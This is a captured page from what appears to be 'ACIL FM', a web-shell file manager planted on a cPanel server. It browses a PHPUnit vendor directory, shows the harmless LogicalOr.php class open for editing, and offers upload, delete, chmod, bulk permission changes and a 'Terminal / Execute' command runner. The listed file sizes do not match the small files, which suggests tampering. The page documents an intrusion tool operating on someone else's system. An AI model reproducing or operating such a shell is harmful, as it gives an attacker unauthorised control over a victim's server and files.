ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/phpunit/phpunit/src/Framework/Constraint/Operator
/
opt
cpanel
ea-wappspector
vendor
phpunit
phpunit
src
Framework
Constraint
Operator
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
BinaryOperator.php
3.21 MB
chmod
View
DL
Edit
Rename
Delete
LogicalAnd.php
1.31 MB
chmod
View
DL
Edit
Rename
Delete
LogicalNot.php
3.5 MB
chmod
View
DL
Edit
Rename
Delete
LogicalOr.php
1.28 MB
chmod
View
DL
Edit
Rename
Delete
LogicalXor.php
1.64 MB
chmod
View
DL
Edit
Rename
Delete
Operator.php
1.42 MB
chmod
View
DL
Edit
Rename
Delete
UnaryOperator.php
3.42 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/phpunit/phpunit/src/Framework/Constraint/Operator/LogicalOr.php
<?php declare(strict_types=1); /* * This file is part of PHPUnit. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PHPUnit\Framework\Constraint; /** * @no-named-arguments Parameter names are not covered by the backward compatibility promise for PHPUnit */ final class LogicalOr extends BinaryOperator { public static function fromConstraints(mixed ...$constraints): self { return new self(...$constraints); } /** * Returns the name of this operator. */ public function operator(): string { return 'or'; } /** * Returns this operator's precedence. * * @see https://www.php.net/manual/en/language.operators.precedence.php */ public function precedence(): int { return 24; } /** * Evaluates the constraint for parameter $other. Returns true if the * constraint is met, false otherwise. */ public function matches(mixed $other): bool { foreach ($this->constraints() as $constraint) { if ($constraint->evaluate($other, '', true)) { return true; } } return false; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply